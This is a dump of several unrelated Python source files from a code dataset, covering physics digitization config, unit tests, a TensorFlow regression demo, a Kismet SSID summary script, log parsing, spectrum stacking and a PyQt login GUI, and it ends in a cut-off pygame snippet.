import overlayFlags\n if overlayFlags.isOverlayMT():\n kwargs.setdefault(\"OnlyUseContainerName\", False)\n kwargs.setdefault(\"OutputObjectName\", overlayFlags.sigPrefix() + \"TRT_RDOs\")\n kwargs.setdefault(\"OutputSDOName\", overlayFlags.sigPrefix() + \"TRT_SDO_Map\")\n else:\n kwargs.setdefault(\"OutputObjectName\", overlayFlags.evtStore()+\"+TRT_RDOs\")\n kwargs.setdefault(\"OutputSDOName\", overlayFlags.evtStore()+ \"+TRT_SDO_Map\")\n kwargs.setdefault(\"HardScatterSplittingMode\", 0)\n kwargs.setdefault(\"Override_getT0FromData\", 0)\n kwargs.setdefault(\"Override_noiseInSimhits\", 0)\n kwargs.setdefault(\"Override_noiseInUnhitStraws\", 0)\n kwargs.setdefault(\"Override_isOverlay\", 1)\n return BasicTRTDigitizationTool(name,**kwargs)\n\ndef TRT_OverlayDigitization(name=\"TRT_OverlayDigitization\",**kwargs):\n kwargs.setdefault(\"DigitizationTool\", \"TRT_OverlayDigitizationTool\")\n # Multi-threading settinggs\n from AthenaCommon.ConcurrencyFlags import jobproperties as concurrencyProps\n is_hive = (concurrencyProps.ConcurrencyFlags.NumThreads() > 0)\n if is_hive:\n kwargs.setdefault('Cardinality', concurrencyProps.ConcurrencyFlags.NumThreads())\n # Set common overlay extra inputs\n kwargs.setdefault(\"ExtraInputs\", [(\"McEventCollection\", \"TruthEvent\")])\n\n return CfgMgr.TRTDigitization(name,**kwargs)\n","sub_path":"InnerDetector/InDetDigitization/TRT_Digitization/python/TRT_DigitizationConfig.py","file_name":"TRT_DigitizationConfig.py","file_ext":"py","file_size_in_byte":6935,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"338504682","text":"from django.core.cache import cache\nfrom django.test import TestCase\nfrom corehq.apps.app_manager.models import Application\nfrom corehq.apps.domain.shortcuts import create_domain\nfrom couchforms.models import XFormInstance\nfrom couchforms.util import spoof_submission\n\n\nclass TestAppId(TestCase):\n def test(self):\n self.domain = 'alskdjfablasdkffsdlkfjabas'\n project = create_domain(name=self.domain)\n app = Application(domain=self.domain)\n app.save()\n app_id = app.get_id\n build = Application(domain=self.domain)\n build.copy_of = app_id\n build.save()\n build_id = build.get_id\n cache.clear()\n try:\n self._test(build_id, app_id, build_id)\n self._test(app_id, app_id, None)\n self._test('alskdjflaksdjf', 'alskdjflaksdjf', None)\n app.delete_app()\n # does this work just as well for a deleted app?\n cache.clear()\n self._test(build_id, app_id, build_id)\n build.delete_app()\n 
cache.clear()\n            self._test(build_id, app_id, build_id)\n        finally:\n            project.delete()\n\n    def _test(self, id, expected_app_id, expected_build_id):\n        r = spoof_submission(\n            '/a/{domain}/receiver/{id}/'.format(domain=self.domain, id=id),\n            '',\n            hqsubmission=False,\n        )\n        form_id = r['X-CommCareHQ-FormID']\n        form = XFormInstance.get(form_id)\n        self.assertEqual(form.app_id, expected_app_id)\n        self.assertEqual(form.build_id, expected_build_id)\n","sub_path":"corehq/apps/receiverwrapper/tests/test_app_id.py","file_name":"test_app_id.py","file_ext":"py","file_size_in_byte":1638,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"208677218","text":"import tensorflow as tf\nfrom progress.bar import Bar\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\ndef func(x):\n    return 3.1 * x + (2 + (0.125 - np.random.random() / 8.))\n\n\ndef prepare_train_data():\n    x_train = np.random.random_sample(size=1000)\n    y_train = [func(x) for x in x_train]\n    return x_train, y_train\n\n\nx_train, y_train = prepare_train_data()\n\nplt.plot(x_train[:200], y_train[:200], 'bo')\n\n# Create the variables W and b\nW = tf.Variable(.1, dtype=tf.float32)\nb = tf.Variable(-.1, dtype=tf.float32)\n\n# Create the x placeholder node, used to feed in x_train[n]\nx = tf.placeholder(tf.float32)\n\n# This is the model function\nlinear_model = x * W + b\n\n# Create the y placeholder node, used to feed in y_train[n]\ny = tf.placeholder(tf.float32)\n\n# Create the loss function, used to measure the gap between the model output and the expected values\nloss = tf.reduce_sum(tf.square(linear_model - y))\n\n# Create a gradient descent optimizer with a learning rate of 0.0001\noptimizer = tf.train.GradientDescentOptimizer(learning_rate=0.0001)\ntrain = optimizer.minimize(loss)\n\n# optimizer.minimize can be expanded into the following two lines\n# gradients = optimizer.compute_gradients(loss)\n# train = optimizer.apply_gradients(gradients)\n\n# Initialize the variables\ninit = tf.global_variables_initializer()\n\n# Train for 10000 iterations\nepochs = 10000\nwith tf.Session() as sess:\n    sess.run(init)\n    with Bar('Processing', max=epochs) as bar:\n        for i in range(epochs):\n            sess.run(train, feed_dict={x: x_train, y: y_train})\n            bar.next()\n\n    r_W, r_b, r_loss = sess.run([W, b, loss], {x: x_train, y: y_train})\n    print('W:{0}, b: {1}, loss: {2}'.format(r_W, r_b, r_loss))\n\n    seeds = np.random.random_sample(size=100)\n\n    x_test = [i * W + b for i in seeds]\n    y_test = [func(i) for i in seeds]\n\n    x_results = sess.run(x_test)\n\n    plt.plot(seeds, x_results, 'ro')\n\nplt.show()\n","sub_path":"original-tf/tf-line-func.py","file_name":"tf-line-func.py","file_ext":"py","file_size_in_byte":1784,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"136473513","text":"import pytest\nfrom aiogithubapi.objects.repository.content import AIOGitHubAPIRepositoryTreeContent\n\nfrom custom_components.racelandshop.validate.common.racelandshop_manifest import RacelandshopManifest\n\n\n@pytest.mark.asyncio\nasync def test_racelandshop_manifest_no_manifest(repository):\n    check = RacelandshopManifest(repository)\n    await check._async_run_check()\n    assert check.failed\n\n\n@pytest.mark.asyncio\nasync def test_racelandshop_manifest_with_manifest(repository):\n    repository.tree = [\n        AIOGitHubAPIRepositoryTreeContent(\n            {\"path\": \"racelandshop.json\", \"type\": \"file\"}, \"test/test\", \"main\"\n        )\n    ]\n    check = RacelandshopManifest(repository)\n    await check._async_run_check()\n    assert not check.failed\n","sub_path":"tests/validate/common/test_hacs_manifest_check.py","file_name":"test_hacs_manifest_check.py","file_ext":"py","file_size_in_byte":749,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"566483843","text":"# !/usr/bin/python\n\n\"\"\"\nAuthor: Thomas Laurenson\nEmail: thomas@thomaslaurenson.com\nWebsite: thomaslaurenson.com\nDate: 2015/05/10\n\nDescription:\nProfile a NetXML file using the NetXML.py module and print a summary.\n\nCopyright (c) 2015, Thomas Laurenson\n\n###############################################################################\nThis program is free software: you can redistribute it and/or modify\nit under the terms of the GNU General Public License as published by\nthe Free Software Foundation, either version 3 of the License, or\n(at your option) any later version.\n\nThis program is distributed in the hope that it will be useful,\nbut WITHOUT ANY WARRANTY; without even the implied warranty of\nMERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\nGNU General Public License for more details.\n\nYou should have received a copy of the GNU General Public License\nalong with this program. If not, see .\n###############################################################################\n\n>>> CHANGELOG:\n 0.1.0 Base functionality\n\"\"\"\n\n__version__ = \"0.1.0\"\n\nimport os\nimport collections\nimport NetXML\n\n################################################################################\nif __name__==\"__main__\":\n import argparse\n parser = argparse.ArgumentParser(description='''NetXML_KnownSSIDs.py''')\n parser.add_argument(\"netxml_file\",\n help = \"Target NetXML file (e.g. Kismet-20150506-08-23-31-1.netxml)\")\n args = parser.parse_args()\n fi_in = args.netxml_file\n\n known = dict()\n known_ssids = [\"vodafone\",\"slingshot\",\"telecom\",\"thompson\",\"orcon\"]\n\n netxml = NetXML.iterparse(fi_in)\n for w in netxml:\n if isinstance(w, NetXML.WirelessNetwork) and w.ssid and w.ssid.essid:\n for k in known_ssids:\n if k in w.ssid.essid.lower():\n print(k, w.ssid.essid)\n","sub_path":"NetXML_KnownSSIDs.py","file_name":"NetXML_KnownSSIDs.py","file_ext":"py","file_size_in_byte":1901,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"361079865","text":"import time\ntimestr = time.strftime(\"%Y%m%d_%H%M%S\")\nimport datetime as dt\n\ndef find_between( s, first, last ):\n try:\n start = s.index( first ) + len( first )\n end = s.index( last, start )\n return s[start:end]\n except ValueError:\n return \"\"\n\ncompany_name_dir = r'D:\\\\COW\\\\WPA\\\\VFH\\\\UPLOAD\\\\FTP\\v-cowboy\\ETL'\nv_folder_name = r'\\v-'+find_between(company_name_dir,'v-','\\ETL')\nprint(\"v_folder_name \"+v_folder_name)\nfirst_part = company_name_dir+v_folder_name+'+'+timestr\nprint(\"first_part \"+first_part)\n\nrow = r'2018-05-27 00:38:10,580 UPLOAD2_convert_from_excel_to_csv_NEW010.py Monthly Trip Sumary Data forBilling-3.xlsx INFO D:\\\\COW\\\\WPA\\\\VFH\\\\UPLOAD\\\\FTP\\v-cowboy\\ETL\\Monthly Trip Sumary Data forBilling-3.xlsx has been converted to csv'\nif \" INFO \" in row:\n levelname = \"INFO\"\nif \" ERROR \" in row:\n levelname = \"ERROR\"\nprint(\"levelname \"+levelname)\nasctime = '2'+find_between(row,'2',' UPLOAD')\nprint(\"asctime \"+asctime)\ndatetime_object = dt.datetime.strptime(asctime, '%Y-%m-%d %H:%M:%S,%f')\nprint('datetime_object '+str(datetime_object))\nscriptname = 'UPLOAD'+find_between(row,'UPLOAD','.py')+'.py'\nprint(\"scriptname \"+scriptname)\nfilename = find_between(row,'.py ',levelname)\nprint(\"filename \"+filename)\nmessage = row.split(levelname,1)[1].lstrip(' ')\nprint(\"message \"+message)\n\nlevelname = ''\nmessage = ''\nprint('row '+row)\nwords = 
row.split()\nprint(words)\nnumber_of_words = len(words)\nprint('number_of_words '+str(number_of_words))\nfor index, elem in enumerate(words):\n print(index, elem)\n if index == 0:\n asctime = str(words[index])\n if index == 1:\n asctime = asctime+' '+str(words[index])\n datetime_object = dt.datetime.strptime(asctime, '%Y-%m-%d %H:%M:%S,%f')\n if index == 2:\n scriptname = str(words[index])\n if index == 3:\n filename = str(words[index])\n if index == 4:\n levelname = str(words[index])\n if index > 4:\n message = message+words[index]+' '\nif levelname == 'ERROR':\n message = 'ERROR'\nprint('datetime_object '+str(datetime_object))\nprint('scriptname '+scriptname)\nprint('filename '+filename)\nprint('levelname '+levelname)\nprint('message '+message)\n","sub_path":"WPA/VFH/python_programs/junk.py","file_name":"junk.py","file_ext":"py","file_size_in_byte":2187,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"610925064","text":"#stacking v1\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom astropy.modeling import models, fitting\nfrom astropy.io import fits\nfrom scipy import interpolate, signal\nimport os\n#import fitting\nimport sys\n# sys.path.append('C:/Users/alexw/Documents/GitHub/4th_year_project_git/Continuum fitting')\nsys.path.append('C:/Users/jason/GIT/4th_year_project_git/Continuum Fitting')\n#path for other pc sys.path.append('C:/Users/alexw/OneDrive/Documents/University work/4th year work/Main project/4th_year_project_git/Continuum fitting')\nimport fittingmethods as fitmeth\n\n#plt.style.use('mystyle') #path C:\\Users\\alexw\\AppData\\Local\\Programs\\Python\\Python37\\Lib\\site-packages\\matplotlib\\mpl-data\\stylelib\n\n#imports the spectra from the spectra folder\nspecnames = next(os.walk('Spectra'))[2]\nspectot = len(specnames)\n\nspecsample = np.array([0,1000])\n\ngcredshift = 0\ngclyalpha = 1215.67*(1+gcredshift)\nnormspeckstack = np.zeros(100000)\n\nfor specind in specsample:\n wlen, normspec, lyalpha = fitmeth.contfitv6(specind)\n # rfshift = gclyalpha - lyalpha\n wlenshift = wlen/(1+gcredshift)\n # divide here\n # wlenhighres = np.linspace(np.min(wlenshift), np.max(wlenshift), 100000)\n wlenhighres = np.linspace(3900, 9000, 100000)\n\n wlenintpol = interpolate.interp1d(wlenshift, normspec, 'linear')\n normspechighres = wlenintpol(wlenhighres)\n # print(normspechighres)\n normspeckstack = normspeckstack + normspechighres\n # print(normspeckstack)\n plt.figure()\n plt.plot(wlenshift,normspec)\n plt.plot(wlenhighres,normspechighres)\n\n # print(np.min(wlenhighres))\n # print(np.max(wlenhighres))\n\n\n#downsample stacked specind\ndsrange = np.linspace(normspeckstack[0], normspeckstack[-1],5000)\ndsnormspewcstack = signal.resample(normspeckstack, 5000)\n# dsrange = np.linspace(normspeckstack[0], normspeckstack[-1],5000)\n\n#plt.figure()\n#plt.plot(wlenhighres, normspeckstack,'.')\n\nplt.figure()\nplt.plot(wlenhighres, normspeckstack)\nplt.show()\n","sub_path":"Code and data/stacking/Alex_stacking/stacking old/stacking_V1_alex.py","file_name":"stacking_V1_alex.py","file_ext":"py","file_size_in_byte":1962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"164143250","text":"# encoding = utf-8\n\nimport sys\nimport unittest\nimport pandas as pd\nimport time\nimport datetime\nimport multiprocessing\nimport consistency_functions\n\nimport common\nfrom agg_capture import AggregateCapture\nfrom dao.mysql_impl import DataOperationsByMysql\nfrom config.qc_config import 
QualityControlConfig\nfrom aux_entities.vargroup_channels import VargroupChannels\nfrom utility import time_utility as tu\n\n\ndef new_aux_objects(hour):\n    # Load the singleton configuration object\n    my_config = QualityControlConfig()\n\n    # Create the data-access-layer object\n    dao = DataOperationsByMysql(my_config, hour)\n\n    # Fetch the vargroup-related data\n    channel_df = dao.query_channels()\n    aq_dict = dao.query_aq_type_in_dict()\n\n    vg_c = VargroupChannels(channel_df, aq_dict)\n\n    # Fetch the model-related data\n    models = dao.query_consistency_model()\n\n    return my_config, dao, vg_c, models\n\ndef t_agg_capture(hour):\n    my_config, dao, vg_c, models = new_aux_objects(hour)\n    # dev_df = dao.query_active_devices()\n    dev_df = dao.query_active_devices_by_city([771])\n    dfs = dao.query_capture_data_by_hour(hour, dev_df)\n    ac = AggregateCapture(my_config, dao, dfs, vg_c, models)\n    org_dict = ac.capture_to_org(hour)\n    for key in org_dict.keys():\n        print(key,'\\n',org_dict[key].head())\n        org_dict[key].to_csv('org_{}.csv'.format(key))\n\n\ndef main():\n    starttime = '2018-12-13 15:00:00'\n    pool = multiprocessing.Pool(processes=12)\n    result = []\n    for i in range(24*7):\n        hour = tu.datetime_n_hours_before_string(tu.time_str_to_datetime(starttime), i)\n        print(hour)\n        result = pool.apply_async(t_agg_capture, (hour,))\n    pool.close()\n    pool.join()\n    if result.successful():\n        print('successful')\n\n\nif __name__ == \"__main__\":\n    main()\n","sub_path":"quality_control_platform/aggregate_capture/t_agg_capture.py","file_name":"t_agg_capture.py","file_ext":"py","file_size_in_byte":1765,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"458008173","text":"import sys\nfrom PyQt5 import QtCore, QtGui, QtWidgets\nfrom PyQt5.QtWidgets import *\nfrom PyQt5.QtGui import QIcon\nfrom PyQt5.QtCore import pyqtSlot\nimport database as db\nimport GUIWork\n\n\nclass WelcomeScreen(QMainWindow):\n    def __init__(self):\n        super(WelcomeScreen, self).__init__()\n        self.iniUI()\n\n\n    def iniUI(self):\n        self.resize(320, 240)\n        self.setMinimumSize(QtCore.QSize(320, 240))\n        self.setMaximumSize(QtCore.QSize(320, 240))\n        self.centralwidget = QtWidgets.QWidget(self)\n        self.verticalLayout = QtWidgets.QVBoxLayout(self.centralwidget)\n\n        self.label = QtWidgets.QLabel(self.centralwidget)\n        self.label.setText(\"        Machine Learning in a nutshell\")\n        self.verticalLayout.addWidget(self.label)\n\n        self.GuestButton = QtWidgets.QPushButton(self.centralwidget)\n        self.GuestButton.setText(\"Guest\")\n        self.verticalLayout.addWidget(self.GuestButton)\n\n        self.LogInButton = QtWidgets.QPushButton(self.centralwidget)\n        self.LogInButton.setText(\"LogIn\")\n        self.verticalLayout.addWidget(self.LogInButton)\n        self.LogInButton.clicked.connect(self.LogInScreen)\n\n\n        self.SignUpButton = QtWidgets.QPushButton(self.centralwidget)\n        self.SignUpButton.setText(\"SignUp\")\n        self.verticalLayout.addWidget(self.SignUpButton)\n        self.SignUpButton.clicked.connect(self.SignUpScreen)\n\n\n        self.setCentralWidget(self.centralwidget)\n        self.show()\n\n\n    def LogInScreen(self):\n        self.window = LogInScreen()\n        self.window.show()\n        self.close()\n\n\n    def SignUpScreen(self):\n        self.window = SignUpScreen()\n        self.window.show()\n        self.close()\n\n    def MainMenuScreen(self):\n        self.window = MainMenuScreen()\n        self.window.show()\n        self.close()\n\n    def ImportDataScreen(self):\n        self.window = ImportDataScreen()\n        self.window.show()\n        self.close()\n\n\nclass ImportDataScreen(WelcomeScreen):\n\n    def iniUI(self):\n        self.resize(640, 480)\n        self.setMinimumSize(QtCore.QSize(640, 480))\n        self.setMaximumSize(QtCore.QSize(640, 480))\n        self.centralwidget = QtWidgets.QWidget(self)\n        self.centralwidget.setObjectName(\"centralwidget\")\n\n        self.listView = QtWidgets.QListView(self.centralwidget)\n        self.listView.setGeometry(QtCore.QRect(20, 30, 281, 421))\n        self.listView.setObjectName(\"listView\")\n\n        self.addTableButton = QtWidgets.QPushButton(self.centralwidget)\n        self.addTableButton.setGeometry(QtCore.QRect(340, 30, 261, 41))\n        self.addTableButton.setText(\"Add New Table\")\n        self.addTableButton.clicked.connect(self.ImportNewTable)\n\n        self.editTableButton = QtWidgets.QPushButton(self.centralwidget)\n        self.editTableButton.setGeometry(QtCore.QRect(340, 270, 261, 41))\n        self.editTableButton.setText(\"Edit Existing Table\")\n\n        self.removeTableButton = QtWidgets.QPushButton(self.centralwidget)\n        self.removeTableButton.setGeometry(QtCore.QRect(340, 340, 261, 41))\n        self.removeTableButton.setText(\"Remove Existing Table\")\n\n        self.BackButton = QtWidgets.QPushButton(self.centralwidget)\n        self.BackButton.setGeometry(QtCore.QRect(390, 420, 161, 25))\n        self.BackButton.setText(\"Back to Main Menu\")\n        self.BackButton.clicked.connect(self.MainMenuScreen)\n\n        self.verticalScrollBar = QtWidgets.QScrollBar(self.centralwidget)\n        self.verticalScrollBar.setGeometry(QtCore.QRect(280, 30, 20, 411))\n        self.verticalScrollBar.setOrientation(QtCore.Qt.Vertical)\n        self.verticalScrollBar.setObjectName(\"verticalScrollBar\")\n\n        self.buttonBox = QtWidgets.QDialogButtonBox(self.centralwidget)\n        self.buttonBox.setGeometry(QtCore.QRect(400, 230, 151, 25))\n        self.buttonBox.setStandardButtons(QtWidgets.QDialogButtonBox.Cancel|QtWidgets.QDialogButtonBox.Ok)\n        self.buttonBox.setObjectName(\"buttonBox\")\n\n        self.listView_2 = QtWidgets.QListView(self.centralwidget)\n        self.listView_2.setGeometry(QtCore.QRect(340, 80, 261, 131))\n        self.listView_2.setObjectName(\"listView_2\")\n\n        self.verticalScrollBar_2 = QtWidgets.QScrollBar(self.centralwidget)\n        self.verticalScrollBar_2.setGeometry(QtCore.QRect(580, 80, 20, 131))\n        self.verticalScrollBar_2.setOrientation(QtCore.Qt.Vertical)\n        self.verticalScrollBar_2.setObjectName(\"verticalScrollBar_2\")\n\n        self.setCentralWidget(self.centralwidget)\n\n\n    def MainMenuScreen(self):\n        self.window = MainMenuScreen()\n        self.window.show()\n        self.close()\n\n    def ImportNewTable(self):\n        self.window = ImportNewTable()\n        self.window.show()\n        self.close()\n\n\nclass LogInScreen(WelcomeScreen):\n\n    def LogInButtonClk(self):\n        info_tuple = (self.UsernameLineEdit.text(),self.PasswordLineEdit.text())\n        exist = db.LogIn(info_tuple)\n        if exist == 0:\n            self.window = MainMenuScreen()\n            self.window.show()\n            self.close()\n        elif exist == 1:\n            self.msg = QMessageBox()\n            self.msg.setIcon(QMessageBox.Information)\n            self.msg.setText(\"Username does not exist!\")\n            self.msg.show() \n        else:\n            self.msg = QMessageBox()\n            self.msg.setIcon(QMessageBox.Information)\n            self.msg.setText(\"Password is wrong\")\n            self.msg.show() \n\n    def iniUI(self):\n        self.resize(320, 240)\n        self.setMinimumSize(QtCore.QSize(320, 240))\n        self.setMaximumSize(QtCore.QSize(320, 240))\n        self.centralwidget = QtWidgets.QWidget(self)\n\n        self.BackButton = QtWidgets.QPushButton(self.centralwidget)\n        self.BackButton.setGeometry(QtCore.QRect(230, 210, 89, 25))\n        self.BackButton.setText(\"Back\")\n        self.BackButton.clicked.connect(self.WelcomeScreen)\n\n        self.PasswordButton = QtWidgets.QLabel(self.centralwidget)\n        self.PasswordButton.setGeometry(QtCore.QRect(10, 100, 71, 46))\n        self.PasswordButton.setText(\"Password:\")\n\n        self.UsernameButton = QtWidgets.QLabel(self.centralwidget)\n        self.UsernameButton.setGeometry(QtCore.QRect(10, 50, 81, 41))\n        self.UsernameButton.setText(\"Username:\")\n\n        self.UsernameLineEdit = QtWidgets.QLineEdit(self.centralwidget)\n        self.UsernameLineEdit.setGeometry(QtCore.QRect(90, 60, 211, 25))\n\n        self.PasswordLineEdit = QtWidgets.QLineEdit(self.centralwidget)\n        self.PasswordLineEdit.setGeometry(QtCore.QRect(90, 110, 211, 25))\n\n        self.LogInButton = QtWidgets.QPushButton(self.centralwidget)\n        self.LogInButton.setGeometry(QtCore.QRect(10, 150, 291, 25))\n        self.LogInButton.setText(\"Log In\")\n        self.LogInButton.clicked.connect(self.LogInButtonClk)\n\n        self.setCentralWidget(self.centralwidget)\n        self.show()\n\n    def WelcomeScreen(self):\n        self.window = WelcomeScreen()\n        self.window.show()\n        self.close()\n\n    def MainMenuScreen(self):\n        self.window = MainMenuScreen()\n        self.window.show()\n        self.close()\n\n\nclass MainMenuScreen(WelcomeScreen):\n\n    def iniUI(self):\n        self.resize(320, 240)\n        self.setMinimumSize(QtCore.QSize(320, 240))\n        self.setMaximumSize(QtCore.QSize(320, 240))\n        self.centralwidget = QtWidgets.QWidget(self)\n        self.verticalLayout = QtWidgets.QVBoxLayout(self.centralwidget)\n\n        self.WelcomeLabel = QtWidgets.QLabel(self.centralwidget)\n        self.WelcomeLabel.setText(\"          Welcome \\\"User\\\"\")\n        self.verticalLayout.addWidget(self.WelcomeLabel)\n\n        self.AddDataButton = QtWidgets.QPushButton(self.centralwidget)\n        self.AddDataButton.setText(\"Add/Modify Data\")\n        self.verticalLayout.addWidget(self.AddDataButton)\n        self.AddDataButton.clicked.connect(self.ImportDataScreen)\n\n        self.StatisticsButton = QtWidgets.QPushButton(self.centralwidget)\n        self.StatisticsButton.setText(\"Statistics/Machine Learning\")\n        self.verticalLayout.addWidget(self.StatisticsButton)\n        self.StatisticsButton.clicked.connect(self.GuiWork)\n\n        self.LogOutButton = QtWidgets.QPushButton(self.centralwidget)\n        self.LogOutButton.setText(\"Log Out\")\n        self.verticalLayout.addWidget(self.LogOutButton)\n        self.LogOutButton.clicked.connect(self.WelcomeScreen)\n\n        self.setCentralWidget(self.centralwidget)\n\n\n    def GuiWork(self):\n        self.window = GUIWork.Workbench()\n        self.window.show()\n        self.close()\n\n    def WelcomeScreen(self):\n        self.window = WelcomeScreen()\n        self.window.show()\n        self.close()\n\n    def ImportDataScreen(self):\n        self.window = ImportDataScreen()\n        self.window.show()\n        self.close()\n    \n    \nclass SignUpScreen(WelcomeScreen):\n\n    def SignUpButtonClk(self):\n        info_tuple = (self.UsernameLineEdit.text(),self.PasswordLineEdit.\n        text(),self.EmailLineEdit.text(),self.FirstNameLineEdit.text(),\n        self.LastNameLineEdit.text(),self.CompanyLineEdit.text())\n        if db.SignUp(info_tuple) == True:\n            self.window = LogInScreen()\n            self.msg = QMessageBox()\n            self.msg.setIcon(QMessageBox.Information)\n            self.msg.setText(\"Your new account has been created!\")\n            self.msg.show()\n            self.window.show()\n            self.close()\n        else:\n            self.msg = QMessageBox()\n            self.msg.setIcon(QMessageBox.Warning)\n            self.msg.setText(\"Error\")\n            self.msg.show()\n\n\n    def iniUI(self):\n        self.resize(480, 640)\n        self.centralwidget = QtWidgets.QWidget(self)\n\n        self.BackButton = QtWidgets.QPushButton(self.centralwidget)\n        self.BackButton.setGeometry(QtCore.QRect(320, 470, 131, 25))\n        self.BackButton.setText(\"Back\")\n        self.BackButton.clicked.connect(self.WelcomeScreen)\n\n        self.UsernameLineEdit = 
QtWidgets.QLineEdit(self.centralwidget)\n self.UsernameLineEdit.setGeometry(QtCore.QRect(110, 110, 331, 25))\n\n self.PasswordLineEdit = QtWidgets.QLineEdit(self.centralwidget)\n self.PasswordLineEdit.setGeometry(QtCore.QRect(110, 160, 331, 25))\n\n self.UsernameButton = QtWidgets.QLabel(self.centralwidget)\n self.UsernameButton.setGeometry(QtCore.QRect(20, 100, 81, 41))\n self.UsernameButton.setText(\"Username\")\n\n self.PasswordButton = QtWidgets.QLabel(self.centralwidget)\n self.PasswordButton.setGeometry(QtCore.QRect(20, 150, 71, 46))\n self.PasswordButton.setText(\"Password\")\n\n self.SignUpButton = QtWidgets.QPushButton(self.centralwidget)\n self.SignUpButton.setGeometry(QtCore.QRect(0, 440, 291, 91))\n self.SignUpButton.setText(\"Sign Up\")\n self.SignUpButton.clicked.connect(self.SignUpButtonClk)\n \n self.TitleButton = QtWidgets.QLabel(self.centralwidget)\n self.TitleButton.setGeometry(QtCore.QRect(60, 50, 391, 17))\n self.TitleButton.setText(\"Please fill your information to create an account\")\n\n self.EmailButton = QtWidgets.QLabel(self.centralwidget)\n self.EmailButton.setGeometry(QtCore.QRect(20, 210, 71, 46))\n self.EmailButton.setText(\"Email\")\n\n self.EmailLineEdit = QtWidgets.QLineEdit(self.centralwidget)\n self.EmailLineEdit.setGeometry(QtCore.QRect(110, 220, 331, 25))\n\n self.FirstNameButton = QtWidgets.QLabel(self.centralwidget)\n self.FirstNameButton.setGeometry(QtCore.QRect(20, 270, 91, 31))\n self.FirstNameButton.setText(\"First Name*\")\n\n self.LastNameButton = QtWidgets.QLabel(self.centralwidget)\n self.LastNameButton.setGeometry(QtCore.QRect(20, 320, 91, 31))\n self.LastNameButton.setText(\"Last Name*\")\n\n self.CompanyButton = QtWidgets.QLabel(self.centralwidget)\n self.CompanyButton.setGeometry(QtCore.QRect(20, 370, 91, 31))\n self.CompanyButton.setText(\"Company\")\n\n self.FirstNameLineEdit = QtWidgets.QLineEdit(self.centralwidget)\n self.FirstNameLineEdit.setGeometry(QtCore.QRect(110, 270, 331, 25))\n\n self.LastNameLineEdit = QtWidgets.QLineEdit(self.centralwidget)\n self.LastNameLineEdit.setGeometry(QtCore.QRect(110, 320, 331, 25))\n\n self.CompanyLineEdit = QtWidgets.QLineEdit(self.centralwidget)\n self.CompanyLineEdit.setGeometry(QtCore.QRect(110, 370, 331, 25))\n\n self.OptionalButton = QtWidgets.QLabel(self.centralwidget)\n self.OptionalButton.setGeometry(QtCore.QRect(270, 570, 211, 21))\n self.OptionalButton.setText(\"The fields with * are optional\")\n\n self.setCentralWidget(self.centralwidget)\n self.show()\n\n\n\n def WelcomeScreen(self):\n self.window = WelcomeScreen()\n self.window.show()\n self.close()\n\n\nclass ImportNewTable(WelcomeScreen):\n def iniUI(self):\n self.resize(640, 480)\n self.centralwidget = QtWidgets.QWidget(self)\n\n self.HeaderCheckBox = QtWidgets.QCheckBox(self.centralwidget)\n self.HeaderCheckBox.setGeometry(QtCore.QRect(20, 180, 161, 23))\n self.HeaderCheckBox.setText(\"First line header?\")\n\n self.ChooseTypeLabel = QtWidgets.QLabel(self.centralwidget)\n self.ChooseTypeLabel.setGeometry(QtCore.QRect(30, 80, 161, 17))\n self.ChooseTypeLabel.setText(\"Choose the type of file\")\n\n self.ChooseFilePushButton = QtWidgets.QPushButton(self.centralwidget)\n self.ChooseFilePushButton.setGeometry(QtCore.QRect(10, 20, 89, 25))\n self.ChooseFilePushButton.setText(\"Choose File\")\n\n self.ExcelPushButton = QtWidgets.QPushButton(self.centralwidget)\n self.ExcelPushButton.setGeometry(QtCore.QRect(10, 110, 61, 25))\n self.ExcelPushButton.setText(\"Excel\")\n\n self.CSVPushButton = QtWidgets.QPushButton(self.centralwidget)\n 
self.CSVPushButton.setGeometry(QtCore.QRect(80, 110, 61, 25))\n self.CSVPushButton.setText(\"CSV\")\n\n self.TSVPushButton = QtWidgets.QPushButton(self.centralwidget)\n self.TSVPushButton.setGeometry(QtCore.QRect(150, 110, 61, 25))\n self.TSVPushButton.setText(\"TSV\")\n\n self.ResetPushButton = QtWidgets.QPushButton(self.centralwidget)\n self.ResetPushButton.setGeometry(QtCore.QRect(10, 440, 161, 25))\n self.ResetPushButton.setText(\"Reset\")\n\n self.TableView = QtWidgets.QTableView(self.centralwidget)\n self.TableView.setGeometry(QtCore.QRect(250, 20, 361, 401))\n\n self.BackPushButton = QtWidgets.QPushButton(self.centralwidget)\n self.BackPushButton.setGeometry(QtCore.QRect(450, 440, 161, 25))\n self.BackPushButton.setText(\"Back\")\n self.BackPushButton.clicked.connect(self.ImportDataScreen)\n\n self.VerticalScrollBar = QtWidgets.QScrollBar(self.centralwidget)\n self.VerticalScrollBar.setGeometry(QtCore.QRect(590, 19, 20, 401))\n self.VerticalScrollBar.setOrientation(QtCore.Qt.Vertical)\n\n self.setCentralWidget(self.centralwidget)\n self.show()\n\n def ImportDataScreen(self):\n self.window = ImportDataScreen()\n self.window.show()\n self.close() \n\n \n\n\nif __name__=='__main__':\n app = QApplication(sys.argv)\n ex = WelcomeScreen()\n sys.exit(app.exec_())\n","sub_path":"GUI/GUIMainMenu.py","file_name":"GUIMainMenu.py","file_ext":"py","file_size_in_byte":15418,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"119216692","text":"import pygame\nimport sys\n\npygame.init()\nhintergrund = pygame.image.load(\"Bilder\\Karte\\Level1.png\")\nscreen = pygame.display.set_mode([816,624])\nclock = pygame.time.Clock()\npygame.display.set_caption(\"ver1\")\n\nx = 300\ny = 300\n\ngeschw = 3\nbreite = 